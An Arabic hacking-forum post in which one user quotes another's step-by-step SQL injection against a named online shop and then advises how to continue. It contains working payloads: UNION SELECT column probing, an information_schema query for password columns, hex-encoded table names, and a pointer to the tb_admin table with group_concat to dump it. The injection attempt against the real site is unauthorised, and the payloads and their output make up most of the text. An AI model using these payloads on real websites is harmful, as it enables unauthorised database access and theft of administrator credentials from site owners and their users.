عرض مشاركة واحدة
قديم 01-22-2011, 01:34 AM   رقم المشاركة : 225 (permalink)
معلومات العضو
NeTCaT-Ma
 
الصورة الرمزية NeTCaT-Ma
 

 

 
إحصائية العضو








NeTCaT-Ma غير متواجد حالياً

إرسال رسالة عبر MSN إلى NeTCaT-Ma

 

 

إحصائية الترشيح

عدد النقاط : 10
NeTCaT-Ma is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Masaru
عدد الاعمده المصابه 4

كود PHP:
UNION SELECT 1,2,3,
العامود المصاب 4

أصدار القاعده 5

كتبت الاستغلال كامل

كود PHP:
http://www.shopmbtnice.com/article.php?id=-1 UNION SELECT 1,2,3,concat(table_Name,0x3a,column_Name,0x3a,table_schema),5+From+information_schema.columns+Where+column_name+like+CHAR(37, 112, 97, 115, 37)-- 
طلع لي

كود PHP:
tb_account:password:shopmbtnice 
أضفت على الاستغلال السابق كلمت Group

الناتج

كود PHP:
tb_account:password:shopmbtnice
tb_email
:password:shopmbtnice 

أخذت هذي الكلمه (tb_account) وشفرتها في موقع التشفير

وكتبت

كود PHP:
where+table_Name=0x74625f6163636f756e74 
بدل أستعلام جدول الباس

طلع الناتج

كود PHP:
tb_account:id:shopmbtnice 
أنا ألي هنا وقفت ما عرفت أكمل

وأحنى هنا على شان نتعلم من بعض

والي قدر يحقن الموقع يقلي أذا كان عندي خطأ ولا لا

بالتوفيق للجميع

أجل صحيح لاكن هدا tb_account جدول الأعضاء
هدا هو جدول الأدمن tb_admin
من بعد ما شفرت ضع أمر group_ ليطلع لك جميع الأعمدة
من بعد ستصبح الحقنة هكدا
http://www.shopmbtnice.com/article.p...rom+tb_admin--
بالتوفيق
التوقيع

mode : off
I Will Be Back Soon
القرآن الكريم